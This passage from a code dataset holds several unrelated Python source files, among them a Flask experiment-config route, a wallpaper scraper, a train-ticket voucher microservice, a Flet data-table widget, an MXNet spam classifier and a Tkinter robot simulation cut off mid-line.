render_template('app.html')\n\n@home_bp.route(\"/colony\", methods=['GET', 'POST'])\n@login_required\ndef colony():\n    iframe = 'https://colony.denovel.cn'\n    return render_template('colony.html', iframe=iframe)\n\n@home_bp.route(\"/config_experiment\", methods=[\"GET\", \"POST\"])\n@home_bp.route(\"/config_experiment/<step>\", methods=[\"GET\", \"POST\"])\n@login_required\ndef config_experiment(step=0):\n    step = int(step)\n    if request.method == 'POST':\n        experiment_type = request.form['experiment_type']\n        if step == 1:\n            agent_types = AgentTypeModel.objects(\n                corresponding_experiment=experiment_type)\n            return render_template(\n                'config_1.html',\n                experiment_type=experiment_type,\n                agent_types=agent_types\n            )\n        elif step == 2:\n            selected_agents = request.form.getlist('agent_types')\n            experiment_type = request.form['experiment_type']
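\n            # Look up the parameters declared for this experiment type so the step-2 template can render them.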
\n            experiment_params = ComputeExperimentTypeModel.objects.get(\n                experiment_type=experiment_type).experiment_params\n            agent_types = AgentTypeModel.objects.all()\n            selected_agent_types = zip(agent_types, selected_agents)\n\n            return render_template(\n                'config_2.html',\n                experiment_type=experiment_type,\n                experiment_params=experiment_params,\n                agent_types=agent_types,\n                selected_agents=selected_agents,\n                selected_agent_types=selected_agent_types\n            )\n\n        elif step == 3:\n            selected_agents = request.form.getlist('agent_types')\n            experiment_type = request.form['experiment_type']\n            experiment_params = ComputeExperimentTypeModel.objects.get(\n                experiment_type=experiment_type).experiment_params\n            agent_types = AgentTypeModel.objects.all()\n            selected_agent_types = zip(agent_types, selected_agents)\n            params_result = {\n                param: request.form[param] for param in experiment_params\n            }\n            if experiment_type == '_erc20_token':\n\n                erc20_token_world = ERC20TokenWorld(\n                    float(params_result['AgentRadio']),\n                    int(params_result['AgentNumber']),\n                    int(params_result['IterNumbers']),\n                )\n                world_id = erc20_token_world.unique_id\n                max_step = int(params_result['IterNumbers']) - 1\n                erc20_token_world.run()\n            elif experiment_type == '_mbm_experiment':\n                experiment = MBMExperiment(popsize=int(\n                    params_result['popsize']), ngen=int(params_result['ngen']))\n                # while experiment.running:\n                #     experiment.step()\n                experiment.start()\n                world_id = experiment.unique_id\n                max_step = experiment.ngen\n            elif experiment_type == '_pargov_experiment':\n                pass\n            else:\n                pass\n            return render_template(\n                'config_3.html',\n                experiment_type=experiment_type,\n                experiment_params=experiment_params,\n                agent_types=agent_types,\n                selected_agents=selected_agents,\n                selected_agent_types=selected_agent_types,\n                params_result=params_result,\n                world_id=world_id,\n                max_step=max_step\n            )\n\n    else:\n        if step == 0:\n            experiment_types = ComputeExperimentTypeModel.objects.all()\n            return render_template('config_0.html', experiment_types=experiment_types)\n\n\n@home_bp.route(\"/tokens/<max_step>/<world_id>\", methods=[\"GET\", \"POST\"])\ndef token_data(max_step, world_id):\n    c = token_discribute(max_step, world_id)\n    return c.dump_options_with_quotes()\n\n# @home_bp.route(\"/barChart\")\n# def get_bar_chart():\n#     c = bar_base()\n#     return c.dump_options_with_quotes()\n\n\n@home_bp.route(\"/bar\")\ndef get_bar_index():\n    return render_template(\"bart.html\")\n\n\n@home_bp.route(\"/view_result/<experiment_id>\")\ndef view_result(experiment_id):\n    pass\n","repo_name":"casCAD-DAO/casCAD","sub_path":"cascad/server/api/routes/home.py","file_name":"home.py","file_ext":"py","file_size_in_byte":7306,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"40591205613","text":"from math import sqrt\n\ndef main():\n    C=50\n    H=30\n    usr = input(\"Enter the numbers: \")\n    list = usr.split(\",\")\n    for i in list:\n        D = int(i)\n        intermediateValue = ((2*C*D)/H) \n        print(int(sqrt(intermediateValue)),end=\",\")\n    print()    \n\n\nif __name__ == '__main__':\n    main()","repo_name":"hasuq33/My_Python_Program","sub_path":"Practical_Program/Program6.py","file_name":"Program6.py","file_ext":"py","file_size_in_byte":305,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3719093100","text":"# -*- coding: utf-8 -*-\nimport scrapy\nfrom bs4 import BeautifulSoup\nfrom scrapy.http import Request\nimport re\nfrom wallpaper.items import WallpaperItem\n\nnum = 0\n\nclass Jj20Spider(scrapy.Spider):\n    name = 'jj20'
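\n    # Restrict the crawl to the desk.zol.com.cn wallpaper site.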
\n    allowed_domains = ['desk.zol.com.cn']\n    start_urls = ['http://desk.zol.com.cn/dongman/2.html']\n\n    def parse(self, response):\n        Soup = BeautifulSoup(response.text, \"lxml\")\n        if 'dongman' in response.url:\n            for ul in Soup.find_all('ul' ,class_='pic-list2'):\n                for li in ul.find_all('li'):\n                    url = li.a['href']\n                    yield Request('http://desk.zol.com.cn%s'%url)\n        else:\n            # Decide whether to parse another listing page or to grab the image\n            lenNum = len(response.xpath('//*[@id=\"showImg\"]/li[1]/@class').extract()[0].strip().split(' '))\n            if lenNum == 2:\n                for li in response.xpath('//*[@id=\"showImg\"]/li'):\n                    url1 = li.xpath('./a/@href').extract()[0]\n                    yield Request('http://desk.zol.com.cn/%s' %url1)\n            else:\n                url2 = ''\n                # Get the image URL\n                imgUrl1 = response.xpath('//*[@id=\"2560x1600\"]/@href')\n                imgUrl2 = response.xpath('//*[@id=\"1920x1200\"]/@href')\n                imgUrl3 = response.xpath('//*[@id=\"1920x1080\"]/@href')\n\n                if imgUrl1:\n                    url2 = imgUrl1.extract()[0]\n                elif imgUrl2:\n                    url2 = imgUrl2.extract()[0]\n                elif imgUrl3:\n                    url2 = imgUrl3.extract()[0]\n                yield Request('http://desk.zol.com.cn%s'%url2, dont_filter=True, callback=self.getImgUrl)\n\n\n    def getImgUrl(self, response):\n        print(response.xpath('//img/@src').extract()[0])\n        global num\n        num += 1\n        urlImg = response.xpath('//img/@src').extract()[0]\n        if urlImg:\n            item = WallpaperItem()\n            item['name'] = num\n            item['url'] = urlImg\n            yield item","repo_name":"18355166248/wallpaper-python3-beautifulSoup","sub_path":"wallpaper/spiders/jj20.py","file_name":"jj20.py","file_ext":"py","file_size_in_byte":2021,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"34379575871","text":"#coding:utf-8\nimport tornado.ioloop\nimport tornado.web\nimport json\nimport pymysql\nimport urllib\nimport urllib.request\n\nclass GetVoucherHandler(tornado.web.RequestHandler):\n\n    def post(self, *args, **kwargs):\n        #Analyze the data transferred: order id and model indicator (0 stands for ordinary, 1 stands for bullet trains and high-speed trains)\n        data = json.loads(self.request.body)\n        orderId = data[\"orderId\"]\n        type = data[\"type\"]\n        #Query for the existence of a corresponding credential based on the order id\n        queryVoucher = self.fetchVoucherByOrderId(orderId)\n\n        if(queryVoucher == None):\n            #Request the order details based on the order id\n            orderResult = self.queryOrderByIdAndType(orderId,type)\n            order = orderResult['data']\n\n            # jsonStr = json.dumps(orderResult)\n            # self.write(jsonStr)\n\n            #Insert vouchers table into a voucher\n            config = {\n                'host':'ts-voucher-mysql',\n                'port':3306,\n                'user':'root',\n                'password':'root',\n                'db':'voucherservice'\n            }\n            conn = pymysql.connect(**config)\n            cur = conn.cursor()\n            #Insert statement\n            sql = 'INSERT INTO voucher (order_id,travelDate,travelTime,contactName,trainNumber,seatClass,seatNumber,startStation,destStation,price)VALUES(%s, %s, %s, %s, %s, %s, %s, %s, %s, %s)'\n            try:\n                cur.execute(sql,(order['id'],order['travelDate'],order['travelTime'],order['contactsName'],order['trainNumber'],order['seatClass'],order['seatNumber'],order['from'],order['to'],order['price']))\n                conn.commit()\n            finally:\n                conn.close()\n            #Query again to get the credential information just inserted\n            self.write(self.fetchVoucherByOrderId(orderId))\n        else:\n            self.write(queryVoucher)\n\n    def queryOrderByIdAndType(self,orderId,type):\n        type = int(type)\n        #ordinary train\n        if(type == 0):\n            url='http://ts-order-other-service:12032/api/v1/orderOtherService/orderOther/' + orderId\n        else:\n            url='http://ts-order-service:12031/api/v1/orderservice/order/'+orderId\n        header_dict = 
{'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko',\"Content-Type\": \"application/json\"}\n req = urllib.request.Request(url=url,headers=header_dict)# Generate the full data for the page request\n response = urllib.request.urlopen(req)# Send page request\n return json.loads(response.read())# Gets the page information returned by the server\n\n def fetchVoucherByOrderId(self,orderId):\n #Check the voucher for reimbursement for orderId from the voucher table\n config = {\n 'host':'ts-voucher-mysql',\n 'port':3306,\n 'user':'root',\n 'password':'root',\n 'db':'voucherservice'\n }\n conn = pymysql.connect(**config)\n cur = conn.cursor()\n #query statement\n sql = 'SELECT * FROM voucher where order_id = %s'\n try:\n cur.execute(sql,(orderId))\n voucher = cur.fetchone()\n conn.commit()\n #Build return data\n if(cur.rowcount < 1):\n return None\n else:\n voucherData = {}\n voucherData['voucher_id'] = voucher[0]\n voucherData['order_id'] = voucher[1]\n voucherData['travelDate'] = voucher[2]\n voucherData['contactName'] = voucher[4]\n voucherData['train_number'] = voucher[5]\n voucherData['seat_number'] = voucher[7]\n voucherData['start_station'] = voucher[8]\n voucherData['dest_station'] = voucher[9]\n voucherData['price'] = voucher[10]\n jsonStr = json.dumps(voucherData)\n print(jsonStr)\n return jsonStr\n finally:\n conn.close()\n\ndef make_app():\n return tornado.web.Application([\n (r\"/getVoucher\", GetVoucherHandler)\n ])\n\ndef initDatabase():\n config = {\n 'host':'ts-voucher-mysql',\n 'port':3306,\n 'user':'root',\n 'password':'root'\n }\n # Create a connection\n connect = pymysql.connect(**config)\n cur = connect.cursor()\n #create db\n sql = \"CREATE SCHEMA IF NOT EXISTS voucherservice;\"\n try:\n cur.execute(sql)\n connect.commit()\n finally:\n pass\n\n #Use the database\n sql = \"use voucherservice;\"\n try:\n cur.execute(sql)\n connect.commit()\n finally:\n pass\n\n #Create the table\n sql = \"\"\"\n CREATE TABLE if not exists voucherservice.voucher (\n voucher_id INT NOT NULL AUTO_INCREMENT,\n order_id VARCHAR(1024) NOT NULL,\n travelDate VARCHAR(1024) NOT NULL,\n travelTime VARCHAR(1024) NOT NULL,\n contactName VARCHAR(1024) NOT NULL,\n trainNumber VARCHAR(1024) NOT NULL,\n seatClass INT NOT NULL,\n seatNumber VARCHAR(1024) NOT NULL,\n startStation VARCHAR(1024) NOT NULL,\n destStation VARCHAR(1024) NOT NULL,\n price FLOAT NOT NULL,\n PRIMARY KEY (voucher_id));\"\"\"\n try:\n cur.execute(sql)\n connect.commit()\n finally:\n connect.close()\n\nif __name__ == \"__main__\":\n #Create database and tables\n initDatabase()\n app = make_app()\n app.listen(16101)\n tornado.ioloop.IOLoop.current().start()\n\n\n ","repo_name":"WHU-AISE/PBScaler","sub_path":"benchmarks/train-ticket/ts-voucher-service/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":5497,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"53"} +{"seq_id":"37972477056","text":"from django.urls import path\n\nfrom . 
import views\n\napp_name = \"cats\"\nurlpatterns = [\n    # ex: /cats/\n    path(\"\", views.index, name=\"index\"),\n    # ex: /cats/memes/\n    path(\"memes/\", views.memes, name=\"memes\"),\n    # ex: /cats/perse/\n    path(\"perse/\", views.perse, name=\"perse\"),\n    # ex: /cats/scotland/\n    path(\"scotland/\", views.scotland, name=\"scotland\"),\n    # ex: /cats/wild/\n    path(\"wild/\", views.wild, name=\"wild\"),\n    # ex: /cats/guests/\n    path(\"guests/\", views.guests, name=\"guests\"),\n    # ex: /cats/visitor/5/\n    path(\"visitor/<int:pk>/\", views.VisitorView.as_view(), name=\"visitor\"),\n]\n","repo_name":"yulachi/cats-fun-site","sub_path":"cats/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":610,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18295799602","text":"import errno\nimport os\nimport sys\n\nsys.path.append(\n    os.path.normpath(\n        os.path.join(os.path.abspath(__file__), \"..\", \"..\", \"..\", \"common\")\n    )\n)\nfrom env_indigo import *  # noqa\n\nMIN_DIST = 0.1\neps = 0.01\n\nindigo = Indigo()\nindigo.setOption(\"treat-x-as-pseudoatom\", \"1\")\nindigo.setOption(\"smart-layout\", \"1\")\nindigo.setOption(\"molfile-saving-skip-date\", \"1\")\n\nif not os.path.exists(joinPathPy(\"out\", __file__)):\n    try:\n        os.makedirs(joinPathPy(\"out\", __file__))\n    except OSError as e:\n        if e.errno != errno.EEXIST:\n            raise\n\nprint(\"**** Test Macrocycles ****\")\n\nsaver = indigo.writeFile(joinPathPy(\"out/macrocycles.sdf\", __file__))\n\nref_path = getRefFilepath(\"macrocycles.sdf\")\nref = indigo.iterateSDFile(ref_path)\nfor idx, item in enumerate(\n    indigo.iterateSmilesFile(\n        joinPathPy(\"molecules/macrocycles_test.smi\", __file__)\n    )\n):\n    try:\n        print(\"Test Item #{} \".format(idx))\n        mol = item.clone()\n        mol.layout()\n        res = moleculeLayoutDiff(\n            indigo, mol, ref.at(idx).rawData(), ref_is_file=False\n        )\n        print(\"  Result: {}\".format(res))\n        mol.setProperty(\"test\", \"Item #{} \".format(idx))\n        saver.sdfAppend(mol)\n    except IndigoException as e:\n        print(\"Exception for #%s: %s\" % (idx, getIndigoExceptionText(e)))\nsaver.close()\n","repo_name":"epam/Indigo","sub_path":"api/tests/integration/tests/todo/macrocycles.py","file_name":"macrocycles.py","file_ext":"py","file_size_in_byte":1343,"program_lang":"python","lang":"en","doc_type":"code","stars":257,"dataset":"github-code","pt":"53"} +{"seq_id":"7259816359","text":"num_arr = [8, 4, 23, 42, 16, 15]\n\n\ndef insertion_sort(num_arr):\n    for idx_current in range(1, len(num_arr)):\n        # temp holds the value being inserted into the sorted prefix\n        temp = num_arr[idx_current]\n\n        prev_idx = idx_current - 1\n        # shift larger values one slot to the right until temp's position is found\n        while prev_idx >= 0 and temp < num_arr[prev_idx]:\n            num_arr[prev_idx + 1] = num_arr[prev_idx]\n            prev_idx -= 1\n        num_arr[prev_idx + 1] = temp\n\n    return num_arr\n\n\n\n","repo_name":"MISalz/data-structures-and-algorithms-401","sub_path":"python/code_challenges/insertion_sort.py","file_name":"insertion_sort.py","file_ext":"py","file_size_in_byte":727,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74452371047","text":"from dataclasses import asdict, dataclass\nfrom typing import Any, Callable, Optional, Union\n\nimport flet as 
ft\nimport polars as pl\nfrom flet_core.gradients import Gradient\nfrom flet_core.types import (\n AnimationValue,\n BorderRadiusValue,\n OffsetValue,\n ResponsiveNumber,\n RotateValue,\n ScaleValue,\n)\n\n\n@dataclass\nclass DataTableConfig:\n width: ft.OptionalNumber = None\n height: ft.OptionalNumber = None\n left: ft.OptionalNumber = None\n top: ft.OptionalNumber = None\n right: ft.OptionalNumber = None\n bottom: ft.OptionalNumber = None\n expand: Union[None, bool, int] = None\n col: Optional[ResponsiveNumber] = None\n opacity: ft.OptionalNumber = None\n rotate: RotateValue = None\n scale: ScaleValue = None\n offset: OffsetValue = None\n aspect_ratio: ft.OptionalNumber = None\n animate_opacity: AnimationValue = None\n animate_size: AnimationValue = None\n animate_position: AnimationValue = None\n animate_rotation: AnimationValue = None\n animate_scale: AnimationValue = None\n animate_offset: AnimationValue = None\n on_animation_end = None\n tooltip: Optional[str] = None\n visible: Optional[bool] = None\n disabled: Optional[bool] = None\n data: Any = None\n border: Optional[ft.Border] = None\n border_radius: BorderRadiusValue = None\n horizontal_lines: Optional[ft.BorderSide] = None\n vertical_lines: Optional[ft.BorderSide] = None\n checkbox_horizontal_margin: ft.OptionalNumber = None\n column_spacing: ft.OptionalNumber = None\n data_row_color: Union[None, str, dict[ft.MaterialState, str]] = None\n data_row_height: ft.OptionalNumber = None\n data_text_style: Optional[ft.TextStyle] = None\n bgcolor: Optional[str] = None\n gradient: Optional[Gradient] = None\n divider_thickness: ft.OptionalNumber = None\n heading_row_color: Union[None, str, dict[ft.MaterialState, str]] = None\n heading_row_height: ft.OptionalNumber = None\n heading_text_style: Optional[ft.TextStyle] = None\n horizontal_margin: ft.OptionalNumber = None\n show_bottom_border: Optional[bool] = None\n show_checkbox_column: Optional[bool] = None\n sort_ascending: Optional[bool] = None\n sort_column_index: Optional[int] = None\n on_select_all = None\n\n\n@dataclass\nclass ModelDataTableConfig:\n ref: ft.Ref | None = None\n search: bool = False\n search_column_default_index: int = 0\n create_text_model: bool = False\n # row callbacks\n on_select_changed_row: Callable | None = None\n on_long_press_row: Callable | None = None\n # cell callbacks\n on_long_press_cell: Callable | None = None\n on_tap_cell: Callable | None = None\n on_double_tap_cell: Callable | None = None\n on_tap_cancel_cell: Callable | None = None\n on_tap_down_cell: Callable | None = None\n # column callbacks\n on_sort_column: Callable | None = None\n\n\nclass ModelDataTable(ft.UserControl):\n def __init__(\n self,\n *,\n model: pl.DataFrame,\n config: ModelDataTableConfig = ModelDataTableConfig(),\n dt_config: DataTableConfig = DataTableConfig(),\n ) -> None:\n super().__init__(ref=config.ref)\n self.data_table = ft.DataTable(**asdict(dt_config))\n self.config = config\n self.model = model\n if config.search:\n self._setup_search_bar()\n\n @property\n def model(self) -> pl.DataFrame:\n return self._original_model\n\n @model.setter\n def model(self, model: pl.DataFrame) -> None:\n self._original_model = model\n self.render_model(self._original_model)\n if self.config.create_text_model or self.config.search:\n self._text_model = model.with_columns(pl.col(\"*\").cast(pl.Utf8))\n\n def build(self) -> ft.Container:\n scroll = ft.ScrollMode.ADAPTIVE if not self.data_table.expand else None\n controls: list[ft.Control] = [\n ft.Row(\n [self.data_table],\n 
scroll=scroll,\n )\n ]\n if self.config.search:\n controls.insert(0, self.search_bar)\n return ft.Container(ft.Column(controls), border=ft.border.all(2))\n\n def render_model(self, model: pl.DataFrame) -> None:\n self.data_table.columns = [\n ft.DataColumn(ft.Text(column), on_sort=self.config.on_sort_column)\n for column in model.columns\n ]\n self.data_table.rows = [\n ft.DataRow(\n [self._get_cell(cell) for cell in row],\n on_select_changed=self.config.on_select_changed_row,\n on_long_press=self.config.on_long_press_row,\n )\n for row in model.rows()\n ]\n if self.page:\n self.update()\n\n def _get_cell(self, text: str) -> ft.DataCell:\n return ft.DataCell(\n ft.Text(text),\n on_long_press=self.config.on_long_press_cell,\n on_tap=self.config.on_tap_cell,\n on_double_tap=self.config.on_double_tap_cell,\n on_tap_cancel=self.config.on_tap_cancel_cell,\n on_tap_down=self.config.on_tap_down_cell,\n )\n\n def _setup_search_bar(self) -> None:\n self.search_field = self._get_search_field()\n self.column_dropdown = self._get_column_dropdown()\n self.search_bar = ft.Container(\n ft.Row(\n [\n self.column_dropdown,\n self.search_field,\n ],\n ),\n padding=ft.padding.all(10.0),\n )\n\n def _get_column_dropdown(self) -> ft.Dropdown:\n options = [\n ft.dropdown.Option(column_name, column_name)\n for column_name in self._text_model.columns\n ]\n return ft.Dropdown(\n options=options,\n value=str(options[self.config.search_column_default_index].key),\n )\n\n def _get_search_field(self) -> ft.Container:\n def clear(e: ft.ControlEvent) -> None:\n search_field.value = \"\"\n if self.page:\n self.render_model(self._text_model)\n search_field.focus()\n\n search_field = ft.TextField(expand=True, on_change=self._filter_model)\n clear_button = ft.IconButton(ft.icons.HIGHLIGHT_REMOVE, on_click=clear)\n return ft.Container(ft.Row([search_field, clear_button]), expand=True)\n\n def _filter_model(self, e: ft.ControlEvent) -> None:\n query = e.control.value\n if not query:\n self.render_model(self._text_model)\n return\n filtered_model = self._text_model.filter(\n pl.col(str(self.column_dropdown.value)).str.contains(query, literal=True)\n )\n self.render_model(filtered_model)\n\n\ndef main(page: ft.Page) -> None:\n\n model = pl.read_csv(\n file=\"https://raw.githubusercontent.com/iron3oxide/ndcc/main/ndcc/data/charts.csv\",\n infer_schema_length=300,\n )\n parent_config = DataTableConfig(expand=True)\n config = ModelDataTableConfig(\n search=True,\n search_column_default_index=1,\n )\n table = ModelDataTable(model=model, config=config, dt_config=parent_config)\n page.scroll = ft.ScrollMode.ADAPTIVE\n page.add(table)\n page.update()\n\n\nft.app(target=main)\n","repo_name":"iron3oxide/fletched","sub_path":"fletched/controls/datatable.py","file_name":"datatable.py","file_ext":"py","file_size_in_byte":7197,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"53"} +{"seq_id":"35355620847","text":"from __future__ import print_function\n\nimport argparse\nimport logging\nimport mxnet as mx\nfrom mxnet import gluon, autograd\nfrom mxnet.gluon import nn\nimport os\nimport numpy as np\nimport json\nimport time\nimport pandas\nimport shutil\n\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.DEBUG)\n\n\n# ------------------------------------------------------------ #\n# Hosting methods #\n# ------------------------------------------------------------ #\n\ndef model_fn(model_dir):\n logger.info(f\"Preparing model from {model_dir}\")\n net = gluon.nn.SymbolBlock(\n 
outputs=mx.sym.load('{}/model.json'.format(model_dir)),\n inputs=mx.sym.var('data'))\n\n net.load_parameters(f'{model_dir}/model.params', ctx=mx.cpu())\n # net.load_params('{}/model.params'.format(model_dir), ctx=mx.cpu())\n\n logger.info(\"Model prepared!\")\n return net\n\n\ndef transform_fn(net, data, input_content_type, output_content_type):\n logger.info(f\"Received request:\\nData:{data}\\nInputContentType:{input_content_type}\\nOutputContentType:{output_content_type}\")\n try:\n parsed = json.loads(data)\n nda = mx.nd.array(parsed)\n \n output = net(nda)\n sigmoid_output = output.sigmoid()\n prediction = mx.nd.abs(mx.nd.ceil(sigmoid_output - 0.5))\n \n output_obj = {}\n output_obj['predicted_label'] = prediction.asnumpy().tolist()\n output_obj['predicted_probability'] = sigmoid_output.asnumpy().tolist()\n\n response_body = json.dumps(output_obj)\n return response_body, output_content_type\n except Exception as ex:\n response_body = '{error: }' + str(ex)\n logger.info(f\"Exception thrown: {response_body}\")\n return response_body, output_content_type\n\n\n\n# ------------------------------------------------------------ #\n# Training methods #\n# ------------------------------------------------------------ #\n\ndef save(net, model_dir, include_inference_code=True):\n y = net(mx.sym.var('data'))\n y.save('{}/model.json'.format(model_dir))\n net.collect_params().save('{}/model.params'.format(model_dir))\n \n if include_inference_code:\n src = os.path.dirname(os.path.abspath(__file__))\n dest = f'{model_dir}/code'\n logger.info(f'src: {src}')\n logger.info(f'dest: {dest}')\n shutil.copytree(src, dest)\n\ndef get_train_data(data_path, batch_size):\n logger.info('Train data path: ' + data_path)\n df = pandas.read_csv('{}/train.gz'.format(data_path))\n features = df[df.columns[1:]].values.astype(dtype=np.float32)\n labels = df[df.columns[0]].values.reshape((-1, 1)).astype(dtype=np.float32)\n \n return gluon.data.DataLoader(gluon.data.ArrayDataset(features, labels), batch_size=batch_size, shuffle=True)\n\ndef get_val_data(data_path, batch_size):\n logger.info('Validation data path: ' + data_path)\n df = pandas.read_csv('{}/val.gz'.format(data_path))\n features = df[df.columns[1:]].values.astype(dtype=np.float32)\n labels = df[df.columns[0]].values.reshape((-1, 1)).astype(dtype=np.float32)\n \n return gluon.data.DataLoader(gluon.data.ArrayDataset(features, labels), batch_size=batch_size, shuffle=False)\n\ndef test(ctx, net, val_data):\n metric = mx.metric.Accuracy()\n for data, label in val_data:\n data = data.as_in_context(ctx)\n label = label.as_in_context(ctx)\n \n output = net(data)\n sigmoid_output = output.sigmoid() \n prediction = mx.nd.abs(mx.nd.ceil(sigmoid_output - 0.5))\n \n metric.update([label], [prediction])\n return metric.get()\n\ndef define_network():\n net = nn.Sequential()\n with net.name_scope():\n net.add(nn.Dense(64, activation=\"relu\"))\n net.add(nn.Dense(1))\n return net\n\ndef train(\n current_host,\n hosts,\n num_cpus,\n num_gpus,\n training_dir,\n val_dir,\n model_dir,\n batch_size,\n epochs,\n learning_rate,\n momentum,\n log_interval):\n # SageMaker passes num_cpus, num_gpus and other args we can use to tailor training to\n # the current container environment, but here we just use simple cpu context.\n ctx = mx.cpu()\n\n # retrieve the hyperparameters and apply some defaults in case they are not provided.\n train_data = get_train_data(training_dir, batch_size)\n val_data = get_val_data(val_dir, batch_size)\n\n # define the network\n net = define_network()\n\n # 
Collect all parameters from net and its children, then initialize them.\n net.initialize(mx.init.Normal(sigma=1.), ctx=ctx)\n \n # Trainer is for updating parameters with gradient.\n if len(hosts) == 1:\n kvstore = 'device' if num_gpus > 0 else 'local'\n else:\n kvstore = 'dist_device_sync' if num_gpus > 0 else 'dist_sync'\n\n trainer = gluon.Trainer(net.collect_params(), 'adam',\n {'learning_rate': learning_rate},\n kvstore=kvstore)\n \n metric = mx.metric.Accuracy()\n loss = gluon.loss.SigmoidBinaryCrossEntropyLoss()\n\n for epoch in range(epochs):\n \n # reset data iterator and metric at begining of epoch.\n metric.reset()\n btic = time.time()\n for i, (data, label) in enumerate(train_data):\n # Copy data to ctx if necessary\n data = data.as_in_context(ctx)\n label = label.as_in_context(ctx)\n \n # Start recording computation graph with record() section.\n # Recorded graphs can then be differentiated with backward.\n with autograd.record():\n output = net(data)\n L = loss(output, label)\n L.backward()\n\n # take a gradient step with batch_size equal to data.shape[0]\n trainer.step(data.shape[0])\n\n # update metric at last.\n sigmoid_output = output.sigmoid() \n prediction = mx.nd.abs(mx.nd.ceil(sigmoid_output - 0.5))\n metric.update([label], [prediction])\n\n if i % log_interval == 0 and i > 0:\n name, acc = metric.get()\n logger.info('[Epoch %d Batch %d] Training: %s=%f, %f samples/s' %\n (epoch, i, name, acc, batch_size / (time.time() - btic)))\n\n btic = time.time()\n\n name, acc = metric.get()\n logger.info(f'[Epoch {epoch}] Training: {name}={acc}')\n\n name, val_acc = test(ctx, net, val_data)\n logger.info(f'[Epoch {epoch}] Validation: {name}={val_acc}')\n\n return net\n","repo_name":"tmmunroe/spam-detection","sub_path":"sagemaker_model/docker/code/spam_model.py","file_name":"spam_model.py","file_ext":"py","file_size_in_byte":6538,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"69919347048","text":"from math import pi, sin, cos, atan2, sqrt\nfrom tkinter import *\nfrom geom import *\n\n\n################################\n#tkinter drawing functions######\n################################\ndef create_circle(x, y, r, canvas): #center coordinates, radius\n x0 = x - r\n y0 = y - r\n x1 = x + r\n y1 = y + r\n canvas.create_oval(x0, y0, x1, y1,fill=\"white\",width=3)\n\n # canvas.create_line(rob.ultrasonic.x,rob.ultrasonic.y,500,500,fill=\"gray\",dash=(4, 2))\n \n \n\nclass Tether(object):\n def __init__(self, x, y):\n self.anchors = [Point(x,y)]\n def move(self, x, y):\n self.end = Point(x,y)\n def end(self):\n return self.anchors[-1]\n def addAnchor(self,anc):\n self.anchors.append(anc)\n self.length = self.getLength()\n def getLength(self):\n length = 0\n for a in range(len(self.anchors)):\n length += self.anchors[a].getDistance(self.anchors[a-1])\n return length\n def draw(self,canvas):\n count = len(self.anchors)-1\n for a in range(count):\n Line(self.anchors[a],self.anchors[a+1]).draw(canvas)\nclass Robot(Point):\n def __init__(self, x, y,radius,rotation,env,canvas):\n Point.__init__(self, x, y, radius)\n self.rotation = rotation\n self.sensor = Point(self.x+self.radius*cos(self.rotation), self.y+self.radius*sin(self.rotation))\n self.tether = Tether(x,y);\n self.env = env\n self.canvas = canvas\n def setV(self,velocity):\n self.velocity = velocity\n def setW(self,angular_velocity):\n self.angular_velocity = angular_velocity\n def getV(self):\n return self.velocity\n def getW(self):\n return self.angular_velocity\n def 
getRot(self):\n return self.rotation\n def stop(self):\n self.velocity = 0\n self.angular_velocity = 0\n def move(self,time=1):\n self.x = self.x + time*self.velocity*cos(self.rotation)\n self.y = self.y + time*self.velocity*sin(self.rotation)\n self.sensor = Point(self.x+self.radius*cos(self.rotation), self.y+self.radius*sin(self.rotation))\n self.rotation = self.rotation + time*self.angular_velocity\n self.redraw_scene()\n def action(self):\n pass\n def getRange(self,urange,angle):\n distance = urange\n p2 = Point(self.sensor.x + urange*cos(angle), self.sensor.y+urange*sin(angle))\n result = p2\n dline = Line(self.sensor,p2)\n for poly in self.env:\n cross_points,ind= dline.getPolygonIntersection(poly)\n for p in cross_points:\n if self.sensor.getDistance(p) < distance:\n distance = self.sensor.getDistance(p)\n result = p\n return result\n def getLaser(self,urange=200):\n return self.getRange(urange,self.rotation)\n \n def getUltrasonic(self,urange=200,cone_width=30):\n distance = urange\n result = self.getRange(urange,self.rotation)\n step = 1\n for degree in range(0,cone_width+1,step):\n angle = degree-cone_width/2\n angle = pi*(angle/180)\n angle = self.rotation - angle\n rpoint = self.getRange(urange,angle)\n rdistance = self.sensor.getDistance(rpoint)\n if rdistance < distance:\n distance = rdistance\n result = rpoint\n del angle, rpoint, rdistance\n del step, degree\n return result\n \n def getLIDAR(self,n,lrange=200):\n distances = []\n \n return distances\n \n def draw(self):\n urange=200\n create_circle(self.x, self.y, self.radius, self.canvas)\n create_circle(self.x + self.radius*cos(self.rotation), self.y + self.radius*sin(self.rotation), 3, self.canvas)\n #red line in robot to show rotation\n self.canvas.create_line(self.x,\n self.y,\n self.x+self.radius*cos(self.rotation),\n self.y+self.radius*sin(self.rotation),\n fill=\"red\",\n width=3)\n #dashed line to show ultrasonic detection###############\n xy = self.getLaser()\n if not xy==False:\n self.canvas.create_line(self.sensor.x, self.sensor.y,\n xy.x, xy.y,\n fill=\"gray\",\n dash=(4, 2))\n else:\n self.canvas.create_line(self.sensor.x, self.sensor.y,\n self.sensor.x + urange*cos(self.rotation), self.sensor.y+urange*sin(self.rotation),\n fill=\"gray\",\n dash=(4, 2))\n cone_width=30\n angle = self.rotation - pi*((cone_width/2)/180)\n xy = self.getRange(urange, angle)\n if not xy==False:\n self.canvas.create_line(self.sensor.x, self.sensor.y,\n xy.x, xy.y,\n fill=\"gray\",\n dash=(4, 2))\n else:\n self.canvas.create_line(self.sensor.x, self.sensor.y,\n self.sensor.x + urange*cos(angle), self.sensor.y+urange*sin(angle),\n fill=\"gray\",\n dash=(4, 2))\n angle = 